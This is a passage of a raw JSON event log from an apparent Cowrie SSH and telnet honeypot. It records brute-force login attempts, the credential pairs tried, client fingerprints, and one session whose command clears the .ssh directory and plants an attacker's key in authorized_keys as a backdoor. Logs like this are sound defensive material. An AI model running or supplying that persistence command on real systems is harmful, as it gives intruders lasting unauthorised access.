-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:17:29.862122Z","src_ip":"212.227.125.160","session":"aa152a3cb92d"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123","message":"login attempt [es/es123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:17:30.085564Z","src_ip":"212.227.125.160","session":"aa152a3cb92d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:31.245446Z","src_ip":"212.227.125.160","session":"aa152a3cb92d"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1349,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e1f188c8c86","protocol":"ssh","message":"New connection: 102.88.137.80:1349 (1.2.3.4:22) [session: 5e1f188c8c86]","sensor":"my-vps","timestamp":"2025-08-31T01:17:34.237146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:17:34.256510Z","src_ip":"102.88.137.80","session":"5e1f188c8c86"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:17:34.385395Z","src_ip":"102.88.137.80","session":"5e1f188c8c86"}
{"eventid":"cowrie.login.failed","username":"fns","password":"fns@123","message":"login attempt [fns/fns@123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:17:34.902979Z","src_ip":"102.88.137.80","session":"5e1f188c8c86"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:36.035952Z","src_ip":"102.88.137.80","session":"5e1f188c8c86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60078,"dst_ip":"1.2.3.4","dst_port":22,"session":"9743da515f0f","protocol":"ssh","message":"New connection: 212.227.125.160:60078 (1.2.3.4:22) [session: 9743da515f0f]","sensor":"my-vps","timestamp":"2025-08-31T01:17:40.280251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:17:40.281161Z","src_ip":"212.227.125.160","session":"9743da515f0f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:17:40.354697Z","src_ip":"212.227.125.160","session":"9743da515f0f"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-31T01:17:40.574082Z","src_ip":"212.227.125.160","session":"9743da515f0f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:41.761282Z","src_ip":"212.227.125.160","session":"9743da515f0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40786,"dst_ip":"1.2.3.4","dst_port":22,"session":"1843d4cb8d91","protocol":"ssh","message":"New connection: 212.227.235.229:40786 (1.2.3.4:22) [session: 1843d4cb8d91]","sensor":"my-vps","timestamp":"2025-08-31T01:17:45.099148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:17:46.121880Z","src_ip":"212.227.235.229","session":"1843d4cb8d91"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:17:46.122723Z","src_ip":"212.227.235.229","session":"1843d4cb8d91"}
{"eventid":"cowrie.login.failed","username":"dev","password":"root123","message":"login attempt [dev/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:17:52.264507Z","src_ip":"212.227.235.229","session":"1843d4cb8d91"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:54.299052Z","src_ip":"212.227.235.229","session":"1843d4cb8d91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":15174,"dst_ip":"1.2.3.4","dst_port":22,"session":"65ea4d37e44a","protocol":"ssh","message":"New connection: 212.227.125.160:15174 (1.2.3.4:22) [session: 65ea4d37e44a]","sensor":"my-vps","timestamp":"2025-08-31T01:17:56.391500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:17:56.392446Z","src_ip":"212.227.125.160","session":"65ea4d37e44a"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-08-31T01:17:56.611120Z","src_ip":"212.227.125.160","session":"65ea4d37e44a"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:17:57.270395Z","src_ip":"212.227.125.160","session":"65ea4d37e44a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59882,"dst_ip":"1.2.3.4","dst_port":22,"session":"890e4807a5e9","protocol":"ssh","message":"New connection: 212.227.125.160:59882 (1.2.3.4:22) [session: 890e4807a5e9]","sensor":"my-vps","timestamp":"2025-08-31T01:18:07.606310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:18:08.135418Z","src_ip":"212.227.125.160","session":"890e4807a5e9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:18:08.136213Z","src_ip":"212.227.125.160","session":"890e4807a5e9"}
{"eventid":"cowrie.login.failed","username":"dev","password":"root123","message":"login attempt [dev/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:18:10.440790Z","src_ip":"212.227.125.160","session":"890e4807a5e9"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:18:11.965014Z","src_ip":"212.227.125.160","session":"890e4807a5e9"}
{"eventid":"cowrie.session.connect","src_ip":"178.128.127.24","src_port":48434,"dst_ip":"1.2.3.4","dst_port":23,"session":"946ad7a10f0a","protocol":"telnet","message":"New connection: 178.128.127.24:48434 (1.2.3.4:23) [session: 946ad7a10f0a]","sensor":"my-vps","timestamp":"2025-08-31T01:18:29.330289Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T01:18:29.849213Z","src_ip":"178.128.127.24","session":"946ad7a10f0a"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T01:18:31.307948Z","src_ip":"178.128.127.24","session":"946ad7a10f0a"}
{"eventid":"cowrie.session.closed","duration":2.7115774154663086,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:18:32.041809Z","src_ip":"178.128.127.24","session":"946ad7a10f0a"}
{"eventid":"cowrie.session.connect","src_ip":"178.128.127.24","src_port":48450,"dst_ip":"1.2.3.4","dst_port":23,"session":"44547837d787","protocol":"telnet","message":"New connection: 178.128.127.24:48450 (1.2.3.4:23) [session: 44547837d787]","sensor":"my-vps","timestamp":"2025-08-31T01:18:32.221453Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:18:32.714780Z","src_ip":"178.128.127.24","session":"44547837d787"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:18:32.735809Z","src_ip":"178.128.127.24","session":"44547837d787"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.228","src_port":39204,"dst_ip":"1.2.3.4","dst_port":22,"session":"b08b1c1b4af3","protocol":"ssh","message":"New connection: 14.103.112.228:39204 (1.2.3.4:22) [session: b08b1c1b4af3]","sensor":"my-vps","timestamp":"2025-08-31T01:18:34.450263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:18:34.451142Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:18:35.995575Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.login.success","username":"root","password":"eternity","message":"login attempt [root/eternity] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:18:36.557316Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"3.9","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:18:36.644982Z","src_ip":"178.128.127.24","session":"44547837d787"}
{"eventid":"cowrie.session.closed","duration":4.429623603820801,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:18:36.651101Z","src_ip":"178.128.127.24","session":"44547837d787"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:18:36.950411Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:18:36.951119Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:18:36.952055Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:18:37.141372Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:18:37.577831Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:18:37.578552Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:18:37.768199Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:18:37.769188Z","src_ip":"14.103.112.228","session":"b08b1c1b4af3"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.228","src_port":43636,"dst_ip":"1.2.3.4","dst_port":22,"session":"566b9882e904","protocol":"ssh","message":"New connection: 14.103.112.228:43636 (1.2.3.4:22) [session: 566b9882e904]","sensor":"my-vps","timestamp":"2025-08-31T01:18:37.934966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:18:37.936005Z","src_ip":"14.103.112.228","session":"566b9882e904"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:18:38.113020Z","src_ip":"14.103.112.228","session":"566b9882e904"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:18:38.881953Z","src_ip":"14.103.112.228","session":"566b9882e904"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:18:40.070186Z","src_ip":"14.103.112.228","session":"566b9882e904"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.228","src_port":43642,"dst_ip":"1.2.3.4","dst_port":22,"session":"57a00240fd46","protocol":"ssh","message":"New connection: 14.103.112.228:43642 (1.2.3.4:22) [session: 57a00240fd46]","sensor":"my-vps","timestamp":"2025-08-31T01:18:40.257805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:18:40.258518Z","src_ip":"14.103.112.228","session":"57a00240fd46"}
